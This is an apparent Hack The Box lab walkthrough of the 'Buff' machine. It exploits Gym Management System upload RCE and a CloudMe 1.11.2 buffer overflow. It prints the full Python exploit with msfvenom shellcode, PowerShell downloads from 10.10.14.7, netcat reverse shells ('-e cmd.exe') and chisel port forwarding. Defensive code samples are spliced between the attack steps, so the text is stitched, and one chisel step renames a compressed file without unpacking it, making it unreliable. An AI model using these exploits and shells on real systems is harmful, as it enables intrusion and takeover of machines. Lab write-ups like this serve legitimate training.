Buff
Port scan
u505@naos:~/HTB/Machines/Buff$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.198
Starting masscan 1.0.5 at 2021-01-08 19:24:28 GMT  -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.198
Discovered open port 7680/tcp on 10.10.10.198
u505@naos:~/HTB/Machines/Buff$ nmap -sC -sV buff
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 14:25 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.35 seconds

u505@naos:~/HTB/Machines/Buff$ nmap -Pn -sC -sV buff
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 14:25 EST
Nmap scan report for buff (10.10.10.198)
Host is up (0.037s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.62 seconds
Port 7680 was checked too, but it doesn't provide more information.
u505@naos:~/HTB/Machines/Buff$ nmap -Pn -p 8080,7680 -sC -sV buff
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-08 14:27 EST
Nmap scan report for buff (10.10.10.198)
Host is up (0.038s latency).

PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.96 seconds
Web enumeration
The contact page provides the software name, Gym Management System.
u505@naos:~/HTB/Machines/Buff$ searchsploit gym
---------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Executi | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Dirsearch
Dirsearch finds some folders worth exploring, but the exploit seems more useful.
u505@naos:~/HTB/Machines/Buff$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php" -f -t 100 -u http://buff:8080
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: GET | Threads: 100 | Wordlist size: 18441
Error Log: /opt/utils/dirsearch/logs/errors-21-01-11_14-39-37.log
Target: http://buff:8080/
Output File: /opt/utils/dirsearch/reports/buff/_21-01-11_14-39-39.txt
[14:39:39] Starting:
[14:39:40] 403 -   1KB - /.htpasswd.php
[14:39:40] 403 -   1KB - /.hta.php
[14:39:40] 403 -   1KB - /.hta.txt
[14:39:40] 403 -   1KB - /.htaccess.php
[14:39:40] 403 -   1KB - /.hta/
[14:39:40] 403 -   1KB - /.htpasswd.txt
[14:39:53] 200 -   5KB - /about.php
[14:39:53] 200 -   5KB - /About.php
[14:39:54] 403 -   1KB - /admin.cgi
[14:39:54] 403 -   1KB - /admin.pl
[14:39:54] 403 -   1KB - /admin.pl/
[14:39:54] 403 -   1KB - /admin.cgi.txt
[14:39:54] 403 -   1KB - /admin.cgi/
[14:39:54] 403 -   1KB - /admin.pl.txt
[14:40:04] 403 -   1KB - /AT-admin.cgi.txt
[14:40:04] 403 -   1KB - /AT-admin.cgi
[14:40:04] 403 -   1KB - /AT-admin.cgi/
[14:40:05] 403 -   1KB - /aux.php
[14:40:05] 403 -   1KB - /aux.txt
[14:40:05] 403 -   1KB - /aux
[14:40:05] 403 -   1KB - /aux/
[14:40:13] 403 -   1KB - /boot/
[14:40:13] 301 -  326B - /boot  ->  http://buff:8080/boot/
[14:40:16] 403 -   1KB - /cachemgr.cgi.txt
[14:40:16] 403 -   1KB - /cachemgr.cgi
[14:40:16] 403 -   1KB - /cachemgr.cgi/
[14:40:20] 403 -   1KB - /cgi-bin/
[14:40:27] 403 -   1KB - /com2/
[14:40:27] 403 -   1KB - /com2
[14:40:27] 403 -   1KB - /com3
[14:40:27] 403 -   1KB - /com3.php
[14:40:27] 403 -   1KB - /com1.txt
[14:40:27] 403 -   1KB - /com1
[14:40:27] 403 -   1KB - /com1/
[14:40:27] 403 -   1KB - /com1.php
[14:40:27] 403 -   1KB - /com3.txt
[14:40:30] 403 -   1KB - /con/
[14:40:30] 403 -   1KB - /com2.txt
[14:40:30] 403 -   1KB - /con.php
[14:40:30] 403 -   1KB - /com3/
[14:40:30] 403 -   1KB - /con
[14:40:30] 403 -   1KB - /com2.php
[14:40:30] 403 -   1KB - /con.txt
[14:40:31] 200 -   4KB - /contact.php
[14:40:33] 200 -   4KB - /Contact.php
[14:40:55] 200 -   4KB - /edit.php
[14:40:56] 403 -   1KB - /error/
[14:40:57] 301 -  324B - /ex  ->  http://buff:8080/ex/
[14:40:59] 503 -   1KB - /examples
[14:40:59] 503 -   1KB - /examples/
[14:41:04] 200 -   5KB - /ex/
[14:41:07] 200 -   4KB - /feedback.php
[14:41:21] 200 -  143B - /Home.php
[14:41:22] 200 -  143B - /home.php
[14:41:26] 301 -  325B - /img  ->  http://buff:8080/img/
[14:41:26] 403 -   1KB - /img/
[14:41:26] 200 -  73KB - /icons/
[14:41:29] 301 -  329B - /include  ->  http://buff:8080/include/
[14:41:32] 200 -   5KB - /index.php/
[14:41:32] 200 -   5KB - /Index.php
[14:41:32] 403 -   1KB - /include/
[14:41:33] 200 -   5KB - /index.php
[14:41:41] 200 -  18KB - /LICENSE
[14:41:41] 200 -  18KB - /license
[14:41:42] 403 -   1KB - /licenses
[14:41:43] 403 -   1KB - /licenses/
[14:41:46] 403 -   1KB - /lpt1.php
[14:41:46] 403 -   1KB - /lpt1.txt
[14:41:46] 403 -   1KB - /lpt1
[14:41:47] 403 -   1KB - /lpt2.php
[14:41:47] 403 -   1KB - /lpt2
[14:41:47] 403 -   1KB - /lpt2.txt
[14:41:47] 403 -   1KB - /lpt1/
[14:41:47] 403 -   1KB - /lpt2/
[14:42:06] 403 -   1KB - /nul.php
[14:42:06] 403 -   1KB - /nul
[14:42:06] 403 -   1KB - /nul/
[14:42:07] 403 -   1KB - /nul.txt
[14:42:13] 200 -   8KB - /packages.php
[14:42:17] 403 -   1KB - /php-cgi/
[14:42:18] 403 -   1KB - /phpmyadmin/
[14:42:19] 403 -   1KB - /phpmyadmin
[14:42:27] 403 -   1KB - /prn.txt
[14:42:27] 403 -   1KB - /prn
[14:42:27] 403 -   1KB - /prn/
[14:42:28] 403 -   1KB - /prn.php
[14:42:29] 301 -  329B - /profile  ->  http://buff:8080/profile/
[14:42:31] 200 -  132B - /profile/
[14:42:42] 200 -  137B - /register.php
[14:42:52] 403 -   1KB - /server-info/
[14:42:52] 403 -   1KB - /server-status/
[14:42:52] 403 -   1KB - /server-info
[14:42:52] 403 -   1KB - /server-status
[14:43:24] 403 -   1KB - /upload/
[14:43:24] 301 -  328B - /upload  ->  http://buff:8080/upload/
[14:43:24] 200 -  209B - /up.php
[14:43:26] 200 -  107B - /upload.php
[14:43:33] 403 -   1KB - /webalizer/
[14:43:33] 403 -   1KB - /webalizer
Task Completed
User flag
u505@naos:~/HTB/Machines/Buff$ searchsploit -m 48506
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48506
     Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Buff/48506.py
The page upload.php does not check for authentication, and its extension whitelist is bypassed by adding a double extension and changing the content type of the upload.
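To make the two weaknesses concrete from the defender's side, the following added example (not code from this write-up or from Gym Management System, whose upload.php is not shown here) models the bypassable pattern in Python next to a hardened handler: the weak check keys on the last extension and the client-supplied Content-Type, while the hardened one requires an authenticated session, accepts a single extension only, identifies the type from the file's own leading bytes and stores the file under a server-generated name. The `authenticated` flag, the `ALLOWED` table and the file names used are simplifications constructed for the example.

```python
import re
import secrets

# Added example: a constructed model of the flawed upload pattern beside a
# hardened one. It is not the Gym Management System upload.php.

# Allowed image types, keyed by extension, with the bytes each must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# File names of the form name.ext only: one dot, safe characters, no path parts.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")


def weak_upload_check(filename: str, client_content_type: str) -> bool:
    """The bypassable pattern: no authentication, only the last extension is
    compared against the allowlist, and the browser-supplied Content-Type is
    trusted. With the client's file name then reused on disk, 'shell.php.png'
    passes both tests and lands in the web root with a .php segment in its name."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED and client_content_type.startswith("image/")


def hardened_upload(filename: str, data: bytes, authenticated: bool):
    """Returns (True, stored_name) or (False, reason).

    The client Content-Type is ignored entirely: the type is taken from the
    file's own leading bytes and must agree with the single allowed extension,
    the caller must already be authenticated, and the stored name is generated
    server-side so nothing the client chose is ever used as a path."""
    if not authenticated:
        return False, "authentication required"
    if not SAFE_NAME.fullmatch(filename):
        return False, "unexpected file name"
    ext = filename.rsplit(".", 1)[-1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        return False, "extension not allowed"
    if not data.startswith(magic):
        return False, "content does not match extension"
    stored = f"{secrets.token_hex(16)}.{ext}"   # never reuse the client's name
    return True, stored


if __name__ == "__main__":
    print(weak_upload_check("shell.php.png", "image/png"))              # True: bypass works
    print(hardened_upload("shell.php.png", b"\x89PNG\r\n\x1a\n", True))  # rejected
    print(hardened_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 8, True))
```

The reason the stored name matters as much as the check: with Apache's `AddHandler` mapping for `.php`, every extension in a file name is considered, so a file written to the web root as `x.php.png` can still be executed as PHP. Generating the name server-side removes that path regardless of what the allowlist does.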
u505@naos:~/HTB/Machines/Buff$ python 48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU=====================" 
              \/

[+] Successfully connected to webshell.

C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun
Obtain friendly shell
Start a web server to serve the executables the target machine needs to download.
u505@naos:~/HTB/Machines/Buff$ mkdir web
u505@naos:~/HTB/Machines/Buff$ cd web
u505@naos:~/HTB/Machines/Buff/web$ cp /opt/utils/nc.exe/nc64.exe ./
u505@naos:~/HTB/Machines/Buff/web$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505: 
Serving HTTP on 0.0.0.0 port 80 ...
Download nc64.exe from the target.
C:\xampp\htdocs\gym\upload> powershell -c "Invoke-WebRequest -Uri http://10.10.14.7/nc64.exe -OutFile nc64.exe" �PNG
Start a listener.
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -nlvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Call nc to open a reverse shell.
C:\xampp\htdocs\gym\upload> nc64.exe 10.10.14.7 4444 -e cmd.exe
The reverse shell starts.
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -nlvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.198.
Ncat: Connection from 10.10.10.198:49907.
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload> whoami
whoami
buff\shaun
User flag
C:\xampp\htdocs\gym\upload>cd C:\Users\shaun\Desktop
cd C:\Users\shaun\Desktop

C:\Users\shaun\Desktop>type user.txt
type user.txt
<USER_FLAG>
Privilege escalation
Uploading and running winPEAS.exe doesn't give a hint on how to escalate, but in the user's Downloads folder there is an executable.
C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  12:27    <DIR>          .
14/07/2020  12:27    <DIR>          ..
16/06/2020  15:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   9,354,883,072 bytes free
The program is running.
C:\Users\shaun\Downloads>tasklist /v
tasklist /v

Image Name                     PID Session Name        Session#    Mem Usage Status          User Name                                              CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process              0                            0          8 K Unknown         NT AUTHORITY\SYSTEM                                     6:18:41 N/A
...
conhost.exe                   5428                            0     11,072 K Unknown         N/A                                                     0:00:03 N/A
CloudMe.exe                   7524                            0     27,268 K Unknown         N/A                                                     0:00:01 N/A
timeout.exe                    124                            0      3,964 K Unknown         N/A                                                     0:00:00 N/A
tasklist.exe                  2580                            0      7,740 K Unknown         BUFF\shaun                                              0:00:00 N/A
CloudMe 1.11.2 buffer overflow exploit
u505@naos:~/HTB/Machines/Buff$ searchsploit cloudme
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Buff$ searchsploit -m 48389
  Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
      URL: https://www.exploit-db.com/exploits/48389
     Path: /usr/share/exploitdb/exploits/windows/remote/48389.py
File Type: ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Buff/48389.py
The exploit sends a payload to port 8888 and triggers a buffer overflow that allows a command to be executed.
u505@naos:~/HTB/Machines/Buff$ cp 48389.py exploitcloudme.py
Batch file creation
We create a batch file that runs an nc command calling back to our machine.
C:\Users\shaun\Desktop>echo C:\xampp\htdocs\gym\upload\nc64.exe 10.10.14.7 4445 -e cmd.exe > reverse.bat
echo C:\xampp\htdocs\gym\upload\nc64.exe 10.10.14.7 4445 -e cmd.exe > reverse.bat
Create payload from exploit
Following the PoC example, we create the payload with msfvenom so that it runs the batch file.
u505@naos:~/HTB/Machines/Buff$ msfvenom -a x86 -p windows/exec CMD=C:\\Users\\shaun\\Desktop\\reverse.bat -b '\x00\x0A\x0D' -f python
We insert the generated code into our Python file.
u505@naos:~/HTB/Machines/Buff$ cat exploitcloudme.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

#u505@naos:~/HTB/Machines/Buff$ msfvenom -a x86 -p windows/exec CMD=C:\\Users\\shaun\\Desktop\\reverse.bat -b '\x00\x0A\x0D' -f python
#[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
#Found 11 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 246 (iteration=0)
#x86/shikata_ga_nai chosen with final size 246
#Payload size: 246 bytes
#Final size of python file: 1204 bytes
buf = b""
buf += b"\xd9\xe5\xbd\x32\xa7\x51\xd0\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x37\x31\x6f\x1a\x83\xc7\x04\x03\x6f\x16\xe2"
buf += b"\xc7\x5b\xb9\x52\x27\xa4\x3a\x33\xae\x41\x0b\x73\xd4"
buf += b"\x02\x3c\x43\x9f\x47\xb1\x28\xcd\x73\x42\x5c\xd9\x74"
buf += b"\xe3\xeb\x3f\xba\xf4\x40\x03\xdd\x76\x9b\x57\x3d\x46"
buf += b"\x54\xaa\x3c\x8f\x89\x46\x6c\x58\xc5\xf4\x81\xed\x93"
buf += b"\xc4\x2a\xbd\x32\x4c\xce\x76\x34\x7d\x41\x0c\x6f\x5d"
buf += b"\x63\xc1\x1b\xd4\x7b\x06\x21\xaf\xf0\xfc\xdd\x2e\xd1"
buf += b"\xcc\x1e\x9c\x1c\xe1\xec\xdd\x59\xc6\x0e\xa8\x93\x34"
buf += b"\xb2\xaa\x67\x46\x68\x3f\x7c\xe0\xfb\xe7\x58\x10\x2f"
buf += b"\x71\x2a\x1e\x84\xf6\x74\x03\x1b\xdb\x0e\x3f\x90\xda"
buf += b"\xc0\xc9\xe2\xf8\xc4\x92\xb1\x61\x5c\x7f\x17\x9e\xbe"
buf += b"\x20\xc8\x3a\xb4\xcd\x1d\x37\x97\x9b\xe0\xca\xad\xee"
buf += b"\xe3\xd4\xad\x5e\x8c\xe5\x26\x31\xcb\xfa\xec\x75\x23"
buf += b"\xb1\xad\xdc\xac\x1f\x24\x5d\xb1\xa0\x92\xa2\xcc\x22"
buf += b"\x17\x5b\x2b\x3a\x52\x5e\x77\xfd\x8e\x12\xe8\x6b\xb1"
buf += b"\x81\x09\xbe\xf2\x1f\xaa\x15\x86\x3a\x20\xe6\x34\xb6"
buf += b"\xac\x69\xb0\x56\x71\x2d\x5f\xd4\xe2\xd9\xf0\x6a\xa9"
buf += b"\x53\x6a\xfd\x34\xe1\x07\x64\x99\x67\x89\x12\xe5"
# The reverse.bat payload replaces the calc.exe one above.
payload = buf

# Pad the message to a fixed 1500 bytes.
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,8888))
    s.send(buf)
except Exception as e:
    # The PoC printed sys.exc_value, which only exists in Python 2 and
    # needs an import of sys; print the caught exception instead.
    print(e)
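The PoC above relies on a hardcoded return address (0x68A842B5, a PUSH ESP; RET gadget) that stays valid only if the module containing it is mapped at the same base on every run, which is what the DYNAMIC_BASE (ASLR) bit of the DllCharacteristics field in the PE optional header controls, next to NX_COMPAT for DEP. The write-up does not name that module or its flags. The following is an added example, not part of the original write-up or of the PoC, that reads those bits from a PE header so a defender can audit which binaries on a host lack them. It is exercised on a constructed, header-only image produced by the hypothetical `build_stub_pe` helper so it runs offline; for a real audit, pass the bytes of an actual file to `pe_mitigations`.

```python
import struct

# Added example, not part of the write-up or of the PoC: read the exploit
# mitigation flags from a PE header. A hardcoded gadget address such as the
# PoC's 0x68A842B5 only works when the module holding it loads at a fixed
# base, i.e. when DYNAMIC_BASE is clear.

IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in


def pe_mitigations(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header and
    report which mitigation bits are set in DllCharacteristics."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                      # the COFF file header is 20 bytes
    if opt_size < 72:
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ layouts.
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dllchar & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "high_entropy_va": bool(dllchar & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
    }


def build_stub_pe(dllcharacteristics: int, pe32plus: bool = False) -> bytes:
    """Hypothetical helper: a minimal header-only PE image (not runnable) so
    the parser can be exercised offline. Constructed for this example."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    opt_size = 240 if pe32plus else 224
    machine = 0x8664 if pe32plus else 0x14C
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dllcharacteristics)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    hardened = build_stub_pe(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
                             | IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
    legacy = build_stub_pe(0)
    print("hardened:", pe_mitigations(hardened))
    print("legacy:  ", pe_mitigations(legacy))
```

A module reported with `aslr` False is one whose addresses an attacker can hardcode; when such a module is loaded by a process that runs as Administrator and listens on a socket, it is the combination to fix first.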
Start the listener
u505@naos:~/HTB/Machines/Buff$ rlwrap nc -lnvp 4445
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Port redirection
Port 8888 is only reachable from localhost (127.0.0.1) on the target, so we need to forward a port of our own to it. We will use chisel with a reverse tunnel, so that port 8888 on our attacker machine is forwarded to port 8888 on the target's localhost.
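The tasklist output in the privilege escalation section shows CloudMe.exe running as an account the low-privileged user cannot even see, and the paragraph above makes the key point: binding to 127.0.0.1 is not a security boundary once anyone can run code on the host, because a tunnel exposes the port anyway. The added example below, which is not part of the original write-up, is the audit a defender would run to find such services: it parses lines in the shape of `netstat -ano` output, joins them with a PID-to-account map as an elevated `tasklist /v` would give it, and reports loopback-only listeners owned by SYSTEM or an Administrator account. The sample rows and the owner map are constructed for the example (port 8888 and PID 7524 are taken from the write-up; the rest are made up).

```python
import re

# Added example, not part of the write-up: find services that only listen on
# the loopback interface yet run as a privileged account. Such a service is
# reachable by any local user, and with a tunnel it is reachable remotely too.

# Constructed sample in the shape of `netstat -ano` output. Port 8888 and PID
# 7524 are the values seen in the write-up; the other rows are made up.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       3116
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       2260
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       7524
  TCP    10.10.10.198:49907     10.10.14.7:4444        ESTABLISHED     5080
  TCP    [::1]:8888             [::]:0                 LISTENING       7524
"""

# Constructed PID -> account map, as an elevated `tasklist /v` would show it.
PROCESS_OWNERS = {
    3116: "NT AUTHORITY\\SYSTEM",
    2260: "NT AUTHORITY\\SYSTEM",
    7524: "BUFF\\Administrator",
    5080: "BUFF\\shaun",
}

LISTEN_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_listeners(netstat_text):
    """Return (local_address, port, pid) for every TCP LISTENING row."""
    rows = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return rows


def is_loopback(addr):
    return addr.startswith("127.") or addr.strip("[]") == "::1"


def is_privileged(account):
    """SYSTEM or a local/domain Administrator account."""
    return account.upper().endswith(("\\SYSTEM", "\\ADMINISTRATOR"))


def privileged_loopback_listeners(netstat_text, owners):
    """Loopback-only listeners whose owning process runs privileged,
    deduplicated by (port, pid) so IPv4 and IPv6 bindings count once."""
    seen, findings = set(), []
    for addr, port, pid in parse_listeners(netstat_text):
        owner = owners.get(pid, "unknown")
        if is_loopback(addr) and is_privileged(owner) and (port, pid) not in seen:
            seen.add((port, pid))
            findings.append((port, pid, owner))
    return findings


if __name__ == "__main__":
    for port, pid, owner in privileged_loopback_listeners(NETSTAT_SAMPLE, PROCESS_OWNERS):
        print(f"127.0.0.1:{port} pid={pid} runs as {owner}: reachable by any local user")
```

Every finding is a process whose input parsing is part of the local attack surface no matter how it is firewalled; the remediation is to run it as a dedicated low-privilege account or to drop the listener, not to rely on the loopback binding.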
u505@naos:~/HTB/Machines/Buff/web$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.3/chisel_1.7.3_windows_amd64.gz
u505@naos:~/HTB/Machines/Buff/web$ gunzip chisel_1.7.3_windows_amd64.gz
Download the chisel program from the target machine.
C:\Users\shaun\Desktop> powershell -c "Invoke-WebRequest -Uri http://10.10.14.7/chisel_1.7.3_windows_amd64 -OutFile chisel.exe"
powershell -c "Invoke-WebRequest -Uri http://10.10.14.7/chisel_1.7.3_windows_amd64 -OutFile chisel.exe"
Download chisel on the attacker machine
u505@naos:~/HTB/Machines/Buff$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.3/chisel_1.7.3_linux_amd64.gz
u505@naos:~/HTB/Machines/Buff$ mv chisel_1.7.3_linux_amd64.gz chisel
Start the chisel server
u505@naos:~/HTB/Machines/Buff$ ./chisel server --reverse --port 4446
2021/01/11 17:28:10 server: Reverse tunnelling enabled
2021/01/11 17:28:10 server: Fingerprint k7guofdpNxngA0JtqWLZqoGd8vRScrEYqypJELF8fdE=
2021/01/11 17:28:10 server: Listening on http://0.0.0.0:4446
Start the chisel client
C:\Users\shaun\Desktop>chisel client 10.10.14.7:4446 R:8888:127.0.0.1:8888
chisel client 10.10.14.7:4446 R:8888:127.0.0.1:8888
2021/01/11 22:41:27 client: Connecting to ws://10.10.14.7:4446
2021/01/11 22:41:28 client: Connected (Latency 39.3174ms)
The server now forwards port 8888.
u505@naos:~/HTB/Machines/Buff$ ./chisel server --reverse --port 4446
2021/01/11 17:28:10 server: Reverse tunnelling enabled
